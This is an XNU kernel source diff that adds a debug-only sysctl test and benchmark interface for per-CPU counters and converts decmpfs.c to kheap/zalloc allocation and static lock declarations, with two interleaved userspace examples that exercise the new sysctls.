+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+/* sysctl interface for testing percpu counters in DEBUG or DEVELOPMENT kernel only. */
+#if !(DEVELOPMENT || DEBUG)
+#error "Counter testing is not enabled on RELEASE configurations"
+#endif
+
+#include <sys/sysctl.h>
+#include <kern/counter.h>
+#include <machine/atomic.h>
+#include <libkern/libkern.h>
+#include <machine/machine_routines.h>
+#include <kern/cpu_data.h>
+
+#include <os/log.h>
+
+#ifdef CONFIG_XNUPOST
+#include <tests/xnupost.h>
+#endif /* CONFIG_XNUPOST */
+
+static _Atomic boolean_t scalable_counter_test_running = FALSE;
+scalable_counter_t test_scalable_counter;
+
+SCALABLE_COUNTER_DEFINE(test_static_scalable_counter);
+
+#ifdef CONFIG_XNUPOST
+kern_return_t counter_tests(void);
+/*
+ * Sanity test that a counter can be modified before zalloc is initialized.
+ */
+static void
+bump_static_counter(void* arg)
+{
+       (void) arg;
+       counter_inc(&test_static_scalable_counter);
+}
+
+STARTUP_ARG(PMAP_STEAL, STARTUP_RANK_MIDDLE, bump_static_counter, NULL);
+
+kern_return_t
+counter_tests()
+{
+       T_ASSERT_EQ_ULLONG(counter_load(&test_static_scalable_counter), 1, "Counter was incremented");
+       return KERN_SUCCESS;
+}
+#endif /* CONFIG_XNUPOST */
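
A hypothetical userspace driver for the counter-test OIDs registered at the bottom of this file; the sysctl names come from the SYSCTL_PROC definitions below, everything else (values, error handling) is illustrative and not part of this change.

#include <stdint.h>
#include <stdio.h>
#include <sys/sysctl.h>

int
main(void)
{
	int one = 1;
	int64_t delta = 42;
	uint64_t value = 0;
	size_t len = sizeof(value);

	/* start -> add -> load -> finish */
	if (sysctlbyname("kern.scalable_counter_test_start", NULL, NULL, &one, sizeof(one)) != 0 ||
	    sysctlbyname("kern.scalable_counter_test_add", NULL, NULL, &delta, sizeof(delta)) != 0 ||
	    sysctlbyname("kern.scalable_counter_test_load", &value, &len, NULL, 0) != 0) {
		perror("scalable_counter test");
		return 1;
	}
	printf("counter value: %llu\n", (unsigned long long)value);
	(void) sysctlbyname("kern.scalable_counter_test_finish", NULL, NULL, &one, sizeof(one));
	return 0;
}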
+
+static int
+sysctl_scalable_counter_test_start SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int ret_val = 1;
+       int error = 0;
+       boolean_t exclusive;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       /* The test doesn't support being run multiple times in parallel. */
+       exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, FALSE, TRUE, seq_cst);
+       if (!exclusive) {
+               os_log(OS_LOG_DEFAULT, "scalable_counter_test: Caught attempt to run the test in parallel.");
+               return EINVAL;
+       }
+       counter_alloc(&test_scalable_counter);
+       return 0;
+}
+
+static int
+sysctl_scalable_counter_test_finish SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       boolean_t exclusive;
+       int ret_val = 0;
+       int error = 0;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       /* The test doesn't support being run multiple times in parallel. */
+       exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, TRUE, FALSE, seq_cst);
+       if (!exclusive) {
+               /* Finish called without start. */
+               return EINVAL;
+       }
+       return 0;
+}
+
+static int
+sysctl_scalable_counter_add SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int64_t value = 0;
+       int error = 0;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       counter_add(&test_scalable_counter, value);
+       return 0;
+}
+
+static int
+sysctl_static_scalable_counter_add SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int64_t value = 0;
+       int error = 0;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       counter_add(&test_static_scalable_counter, value);
+       return 0;
+}
+
+static int
+sysctl_scalable_counter_load SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       uint64_t value;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       value = counter_load(&test_scalable_counter);
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+static int
+sysctl_scalable_counter_write_benchmark SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int error;
+       int64_t iterations;
+       int ret_val = 0;
+       if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) {
+               /* Must call start */
+               return EINVAL;
+       }
+       error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       for (int64_t i = 0; i < iterations; i++) {
+               counter_inc(&test_scalable_counter);
+       }
+       return 0;
+}
+
+static volatile uint64_t racy_counter;
+
+static int
+sysctl_racy_counter_write_benchmark SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int error;
+       int64_t iterations;
+       int ret_val = 0;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       for (int64_t i = 0; i < iterations; i++) {
+               racy_counter++;
+       }
+       return 0;
+}
+
+static int
+sysctl_racy_counter_load SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       uint64_t value = racy_counter;
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+static _Atomic uint64_t atomic_counter;
+
+static int
+sysctl_atomic_counter_write_benchmark SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       int error;
+       int64_t iterations;
+       int ret_val = 0;
+       error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL);
+       if (error || !req->newptr) {
+               return error;
+       }
+       for (int64_t i = 0; i < iterations; i++) {
+               os_atomic_add(&atomic_counter, 1, relaxed);
+       }
+       return 0;
+}
+
+static int
+sysctl_atomic_counter_load SYSCTL_HANDLER_ARGS
+{
+#pragma unused(oidp, arg1, arg2)
+       uint64_t value = os_atomic_load_wide(&atomic_counter, relaxed);
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_start,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_test_start, "I", "Setup per-cpu counter test");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_finish,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_test_finish, "I", "Finish per-cpu counter test");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_add,
+    CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_add, "I", "Perform an add on the per-cpu counter");
+
+SYSCTL_PROC(_kern, OID_AUTO, static_scalable_counter_test_add,
+    CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_static_scalable_counter_add, "I", "Perform an add on the static per-cpu counter");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_load,
+    CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_load, "I", "Load the current per-cpu counter value.");
+
+SYSCTL_SCALABLE_COUNTER(_kern, static_scalable_counter_test_load,
+    test_static_scalable_counter, "Load the current static per-cpu counter value.");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_write_benchmark,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_scalable_counter_write_benchmark, "I", "Per-cpu counter write benchmark");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_benchmark,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_racy_counter_write_benchmark, "I", "Global counter racy benchmark");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_load,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_racy_counter_load, "I", "Global counter racy load");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_write_benchmark,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_atomic_counter_write_benchmark, "I", "Atomic counter write benchmark");
+
+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_load,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_atomic_counter_load, "I", "Atomic counter load");
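Taken together, the handlers above form a small start/add/load/finish protocol keyed off the scalable_counter_test_running flag. The following userspace sketch is not part of the commit; it assumes a kernel that compiles bsd/kern/counter_test.c (a DEVELOPMENT/DEBUG variant) and a caller privileged enough to write kern.* sysctls, and it drives the new nodes through the standard sysctlbyname(3) interface with abbreviated error handling.

#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/sysctl.h>

int
main(void)
{
	int one = 1;
	int64_t delta = 42;
	uint64_t total = 0;
	size_t len = sizeof(total);

	/* start: sets scalable_counter_test_running and counter_alloc()s the dynamic counter */
	if (sysctlbyname("kern.scalable_counter_test_start", NULL, NULL, &one, sizeof(one)) != 0) {
		perror("scalable_counter_test_start");
		return 1;
	}

	/* add: routed to counter_add() on the dynamically allocated counter */
	sysctlbyname("kern.scalable_counter_test_add", NULL, NULL, &delta, sizeof(delta));

	/* load: counter_load() folds the per-cpu values into a single 64-bit total */
	sysctlbyname("kern.scalable_counter_test_load", &total, &len, NULL, 0);
	printf("scalable counter total: %llu\n", (unsigned long long)total);

	/* finish: clears the running flag so the test can be rerun later */
	sysctlbyname("kern.scalable_counter_test_finish", NULL, NULL, &one, sizeof(one));
	return 0;
}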
index 4040d9b6a59a4004cc7d23328ce281b70dabbf8b..1f5bc434f6ef96208a8ab97d8e10922db6253907 100644 (file)
@@ -80,22 +80,6 @@ UNUSED_SYMBOL(decmpfs_validate_compressed_file)
 #define COMPRESSION_DEBUG_VERBOSE 0
 #define MALLOC_DEBUG 0
 
-static const char *
-baseName(const char *path)
-{
-       if (!path) {
-               return NULL;
-       }
-       const char *ret = path;
-       int i;
-       for (i = 0; path[i] != 0; i++) {
-               if (path[i] == '/') {
-                       ret = &path[i + 1];
-               }
-       }
-       return ret;
-}
-
 #if COMPRESSION_DEBUG
 static char*
 vnpath(vnode_t vp, char *path, int len)
@@ -108,11 +92,21 @@ vnpath(vnode_t vp, char *path, int len)
 }
 #endif
 
-#define ErrorLog(x, args...) printf("%s:%d:%s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, ## args)
+#define ErrorLog(x, args...) \
+       printf("%s:%d:%s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, ## args)
 #if COMPRESSION_DEBUG
-#define ErrorLogWithPath(x, args...) do { char *path; MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, vnpath(vp, path, PATH_MAX), ## args); FREE(path, M_TEMP); } while(0)
+#define ErrorLogWithPath(x, args...) do { \
+       char *path = zalloc(ZV_NAMEI); \
+       printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \
+           vnpath(vp, path, PATH_MAX), ## args); \
+       zfree(ZV_NAMEI, path); \
+} while(0)
 #else
-#define ErrorLogWithPath(x, args...) do { (void*)vp; printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, "<private>", ## args); } while(0)
+#define ErrorLogWithPath(x, args...) do { \
+       (void*)vp; \
+       printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \
+           "<private>", ## args); \
+} while(0)
 #endif
 
 #if COMPRESSION_DEBUG
@@ -131,88 +125,14 @@ vnpath(vnode_t vp, char *path, int len)
 #define VerboseLogWithPath(x...) do { } while(0)
 #endif
 
-#if MALLOC_DEBUG
-
-static SInt32 totalAlloc;
-
-typedef struct {
-       uint32_t allocSz;
-       uint32_t magic;
-       const char *file;
-       int line;
-} allocated;
-
-static void *
-_malloc(uint32_t sz, __unused int type, __unused int flags, const char *file, int line)
-{
-       uint32_t allocSz = sz + 2 * sizeof(allocated);
-
-       allocated *alloc = NULL;
-       MALLOC(alloc, allocated *, allocSz, type, flags);
-       if (!alloc) {
-               ErrorLog("malloc failed\n");
-               return NULL;
-       }
-
-       char *ret = (char*)&alloc[1];
-       allocated *alloc2 = (allocated*)(ret + sz);
-
-       alloc->allocSz = allocSz;
-       alloc->magic = 0xdadadada;
-       alloc->file = file;
-       alloc->line = line;
-
-       *alloc2 = *alloc;
-
-       int s = OSAddAtomic(sz, &totalAlloc);
-       ErrorLog("malloc(%d) -> %p, total allocations %d\n", sz, ret, s + sz);
-
-       return ret;
-}
-
-static void
-_free(char *ret, __unused int type, const char *file, int line)
-{
-       if (!ret) {
-               ErrorLog("freeing null\n");
-               return;
-       }
-       allocated *alloc = (allocated*)ret;
-       alloc--;
-       uint32_t sz = alloc->allocSz - 2 * sizeof(allocated);
-       allocated *alloc2 = (allocated*)(ret + sz);
-
-       if (alloc->magic != 0xdadadada) {
-               panic("freeing bad pointer");
-       }
-
-       if (memcmp(alloc, alloc2, sizeof(*alloc)) != 0) {
-               panic("clobbered data");
-       }
-
-       memset(ret, 0xce, sz);
-       alloc2->file = file;
-       alloc2->line = line;
-       FREE(alloc, type);
-       int s = OSAddAtomic(-sz, &totalAlloc);
-       ErrorLog("free(%p,%d) -> total allocations %d\n", ret, sz, s - sz);
-}
-
-#undef MALLOC
-#undef FREE
-#define MALLOC(space, cast, size, type, flags) (space) = (cast)_malloc(size, type, flags, __FILE__, __LINE__)
-#define FREE(addr, type) _free((void *)addr, type, __FILE__, __LINE__)
-
-#endif /* MALLOC_DEBUG */
-
 #pragma mark --- globals ---
 
-static lck_grp_t *decmpfs_lockgrp;
+static LCK_GRP_DECLARE(decmpfs_lockgrp, "VFSCOMP");
+static LCK_RW_DECLARE(decompressorsLock, &decmpfs_lockgrp);
+static LCK_MTX_DECLARE(decompress_channel_mtx, &decmpfs_lockgrp);
 
 static const decmpfs_registration *decompressors[CMP_MAX]; /* the registered compressors */
-static lck_rw_t * decompressorsLock;
 static int decompress_channel; /* channel used by decompress_file to wake up waiters */
-static lck_mtx_t *decompress_channel_mtx;
 
 vfs_context_t decmpfs_ctx;
 
@@ -280,20 +200,20 @@ _decmp_get_func(vnode_t vp, uint32_t type, uintptr_t offset, uint32_t discrimina
                snprintf(resourceName, sizeof(resourceName), "com.apple.AppleFSCompression.Type%u", type);
                ErrorLogWithPath("waiting for %s\n", resourceName);
                while (decompressors[type] == NULL) {
-                       lck_rw_unlock_shared(decompressorsLock); // we have to unlock to allow the kext to register
+                       lck_rw_unlock_shared(&decompressorsLock); // we have to unlock to allow the kext to register
                        if (IOServiceWaitForMatchingResource(resourceName, delay)) {
-                               lck_rw_lock_shared(decompressorsLock);
+                               lck_rw_lock_shared(&decompressorsLock);
                                break;
                        }
                        if (!IOCatalogueMatchingDriversPresent(providesName)) {
                                //
                                ErrorLogWithPath("the kext with %s is no longer present\n", providesName);
-                               lck_rw_lock_shared(decompressorsLock);
+                               lck_rw_lock_shared(&decompressorsLock);
                                break;
                        }
                        ErrorLogWithPath("still waiting for %s\n", resourceName);
                        delay *= 2;
-                       lck_rw_lock_shared(decompressorsLock);
+                       lck_rw_lock_shared(&decompressorsLock);
                }
                // IOKit says the kext is loaded, so it should be registered too!
                if (decompressors[type] == NULL) {
@@ -351,13 +271,13 @@ void
 decmpfs_cnode_init(decmpfs_cnode *cp)
 {
        memset(cp, 0, sizeof(*cp));
-       lck_rw_init(&cp->compressed_data_lock, decmpfs_lockgrp, NULL);
+       lck_rw_init(&cp->compressed_data_lock, &decmpfs_lockgrp, NULL);
 }
 
 void
 decmpfs_cnode_destroy(decmpfs_cnode *cp)
 {
-       lck_rw_destroy(&cp->compressed_data_lock, decmpfs_lockgrp);
+       lck_rw_destroy(&cp->compressed_data_lock, &decmpfs_lockgrp);
 }
 
 bool
@@ -549,7 +469,7 @@ decmpfs_cnode_cmp_type(decmpfs_cnode *cp)
 #pragma mark --- decmpfs state routines ---
 
 static int
-decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid)
+decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid, size_t *hdr_size)
 {
        /*
         *  fetches vp's compression xattr, converting it into a decmpfs_header; returns 0 or errno
@@ -559,6 +479,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
 
        size_t read_size             = 0;
        size_t attr_size             = 0;
+       size_t alloc_size            = 0;
        uio_t attr_uio               = NULL;
        int err                      = 0;
        char *data                   = NULL;
@@ -581,7 +502,8 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
        if (no_additional_data) {
                /* this file's xattr didn't have any extra data when we fetched it, so we can synthesize a header from the data in the cnode */
 
-               MALLOC(data, char *, sizeof(decmpfs_header), M_TEMP, M_WAITOK);
+               alloc_size = sizeof(decmpfs_header);
+               data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK);
                if (!data) {
                        err = ENOMEM;
                        goto out;
@@ -609,6 +531,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
                if (err != 0) {
                        goto out;
                }
+               alloc_size = attr_size + sizeof(hdr->attr_size);
 
                if (attr_size < sizeof(decmpfs_disk_header) || attr_size > MAX_DECMPFS_XATTR_SIZE) {
                        err = EINVAL;
@@ -616,7 +539,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
                }
 
                /* allocation includes space for the extra attr_size field of a compressed_header */
-               MALLOC(data, char *, attr_size + sizeof(hdr->attr_size), M_TEMP, M_WAITOK);
+               data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK);
                if (!data) {
                        err = ENOMEM;
                        goto out;
@@ -669,12 +592,11 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
 out:
        if (err && (err != ERANGE)) {
                DebugLogWithPath("err %d\n", err);
-               if (data) {
-                       FREE(data, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, data, alloc_size);
                *hdrOut = NULL;
        } else {
                *hdrOut = hdr;
+               *hdr_size = alloc_size;
        }
        /*
         * Trace the following parameters on return with event-id 0x03120004.
@@ -744,9 +666,10 @@ errno_t
 decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp)
 {
        /* give a compressor a chance to indicate that a compressed file is invalid */
-
        decmpfs_header *hdr = NULL;
-       errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       size_t alloc_size = 0;
+       errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
+
        if (err) {
                /* we couldn't get the header */
                if (decmpfs_fast_get_state(cp) == FILE_IS_NOT_COMPRESSED) {
@@ -757,7 +680,7 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp)
        }
 
        if (!decmpfs_type_is_dataless(hdr->compression_type)) {
-               lck_rw_lock_shared(decompressorsLock);
+               lck_rw_lock_shared(&decompressorsLock);
                decmpfs_validate_compressed_file_func validate = decmp_get_func(vp, hdr->compression_type, validate);
                if (validate) { /* make sure this validation function is valid */
                        /* is the data okay? */
@@ -769,11 +692,11 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp)
                        /* no validate registered, so nothing to do */
                        err = 0;
                }
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
        }
 out:
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
 #if COMPRESSION_DEBUG
        if (err) {
@@ -799,6 +722,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp)
        uint32_t cmp_state;
        struct vnode_attr va_fetch;
        decmpfs_header *hdr = NULL;
+       size_t alloc_size = 0;
        mount_t mp = NULL;
        int cnode_locked = 0;
        int saveInvalid = 0; // save the header data even though the type was out of range
@@ -882,7 +806,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp)
        }
        if (va_fetch.va_flags & UF_COMPRESSED) {
                /* UF_COMPRESSED is on, make sure the file has the DECMPFS_XATTR_NAME xattr */
-               error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1);
+               error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1, &alloc_size);
                if ((hdr != NULL) && (error == ERANGE)) {
                        saveInvalid = 1;
                }
@@ -942,12 +866,12 @@ done:
                        ubc_setsize(vp, hdr->uncompressed_size);
 
                        /* update the decompression flags in the decmpfs cnode */
-                       lck_rw_lock_shared(decompressorsLock);
+                       lck_rw_lock_shared(&decompressorsLock);
                        decmpfs_get_decompression_flags_func get_flags = decmp_get_func(vp, hdr->compression_type, get_flags);
                        if (get_flags) {
                                decompression_flags = get_flags(vp, decmpfs_ctx, hdr);
                        }
-                       lck_rw_unlock_shared(decompressorsLock);
+                       lck_rw_unlock_shared(&decompressorsLock);
                        decmpfs_cnode_set_decompression_flags(cp, decompression_flags);
                }
        } else {
@@ -959,9 +883,10 @@ done:
                decmpfs_unlock_compressed_data(cp, 1);
        }
 
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
+
        /*
         * Trace the following parameters on return with event-id 0x03120014.
         *
@@ -1021,7 +946,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap)
                                }
 
                                decmpfs_header *hdr = NULL;
-                               error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1);
+                               size_t alloc_size = 0;
+                               error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1, &alloc_size);
                                if (error == 0) {
                                        /*
                                         * Allow the flag to be set since the decmpfs attribute
@@ -1043,8 +969,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap)
                                        /* no DECMPFS_XATTR_NAME attribute, so deny the update */
                                        vap->va_flags &= ~UF_COMPRESSED;
                                }
-                               if (hdr) {
-                                       FREE(hdr, M_TEMP);
+                               if (hdr != NULL) {
+                                       kheap_free(KHEAP_TEMP, hdr, alloc_size);
                                }
                        }
                }
@@ -1057,15 +983,15 @@ static int
 wait_for_decompress(decmpfs_cnode *cp)
 {
        int state;
-       lck_mtx_lock(decompress_channel_mtx);
+       lck_mtx_lock(&decompress_channel_mtx);
        do {
                state = decmpfs_fast_get_state(cp);
                if (state != FILE_IS_CONVERTING) {
                        /* file is not decompressing */
-                       lck_mtx_unlock(decompress_channel_mtx);
+                       lck_mtx_unlock(&decompress_channel_mtx);
                        return state;
                }
-               msleep((caddr_t)&decompress_channel, decompress_channel_mtx, PINOD, "wait_for_decompress", NULL);
+               msleep((caddr_t)&decompress_channel, &decompress_channel_mtx, PINOD, "wait_for_decompress", NULL);
        } while (1);
 }
 
@@ -1145,7 +1071,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat
                goto out;
        }
 
-       lck_rw_lock_exclusive(decompressorsLock); locked = 1;
+       lck_rw_lock_exclusive(&decompressorsLock); locked = 1;
 
        /* make sure the registration for this type is zero */
        if (decompressors[compression_type] != NULL) {
@@ -1158,7 +1084,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat
 
 out:
        if (locked) {
-               lck_rw_unlock_exclusive(decompressorsLock);
+               lck_rw_unlock_exclusive(&decompressorsLock);
        }
        return ret;
 }
@@ -1177,7 +1103,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration
                goto out;
        }
 
-       lck_rw_lock_exclusive(decompressorsLock); locked = 1;
+       lck_rw_lock_exclusive(&decompressorsLock); locked = 1;
        if (decompressors[compression_type] != registration) {
                ret = EEXIST;
                goto out;
@@ -1188,7 +1114,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration
 
 out:
        if (locked) {
-               lck_rw_unlock_exclusive(decompressorsLock);
+               lck_rw_unlock_exclusive(&decompressorsLock);
        }
        return ret;
 }
@@ -1200,11 +1126,11 @@ compression_type_valid(vnode_t vp, decmpfs_header *hdr)
        int ret = 0;
 
        /* every compressor must have at least a fetch function */
-       lck_rw_lock_shared(decompressorsLock);
+       lck_rw_lock_shared(&decompressorsLock);
        if (decmp_get_func(vp, hdr->compression_type, fetch) != NULL) {
                ret = 1;
        }
-       lck_rw_unlock_shared(decompressorsLock);
+       lck_rw_unlock_shared(&decompressorsLock);
 
        return ret;
 }
@@ -1253,11 +1179,11 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h
         */
        DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FETCH_UNCOMPRESSED_DATA, vp->v_id,
            hdr->compression_type, (int)offset, (int)size);
-       lck_rw_lock_shared(decompressorsLock);
+       lck_rw_lock_shared(&decompressorsLock);
        decmpfs_fetch_uncompressed_data_func fetch = decmp_get_func(vp, hdr->compression_type, fetch);
        if (fetch) {
                err = fetch(vp, decmpfs_ctx, hdr, offset, size, nvec, vec, bytes_read);
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
                if (err == 0) {
                        uint64_t decompression_flags = decmpfs_cnode_get_decompression_flags(cp);
                        if (decompression_flags & DECMPFS_FLAGS_FORCE_FLUSH_ON_DECOMPRESS) {
@@ -1272,7 +1198,7 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h
                }
        } else {
                err = ENOTSUP;
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
        }
        /*
         * Trace the following parameters on return with event-id 0x03120008.
@@ -1333,6 +1259,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp
        size_t verify_block_size     = 0;
        void *data                   = NULL;
        decmpfs_header *hdr = NULL;
+       size_t alloc_size            = 0;
        uint64_t cachedSize          = 0;
        int cmpdata_locked           = 0;
        bool file_tail_page_valid    = false;
@@ -1349,7 +1276,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp
                DebugLogWithPath("pagein: unknown flags 0x%08x\n", (flags & ~(UPL_IOSYNC | UPL_NOCOMMIT | UPL_NORDAHEAD)));
        }
 
-       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
        if (err != 0) {
                goto out;
        }
@@ -1613,8 +1540,8 @@ out:
        if (data) {
                ubc_upl_unmap(pl);
        }
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
        if (cmpdata_locked) {
                decmpfs_unlock_compressed_data(cp, 0);
@@ -1622,10 +1549,9 @@ out:
        if (err) {
 #if 0
                if (err != ENXIO && err != ENOSPC) {
-                       char *path;
-                       MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK);
+                       char *path = zalloc(ZV_NAMEI);
                        panic("%s: decmpfs_pagein_compressed: err %d", vnpath(vp, path, PATH_MAX), err);
-                       FREE(path, M_TEMP);
+                       zfree(ZV_NAMEI, path);
                }
 #endif /* 0 */
                ErrorLogWithPath("err %d\n", err);
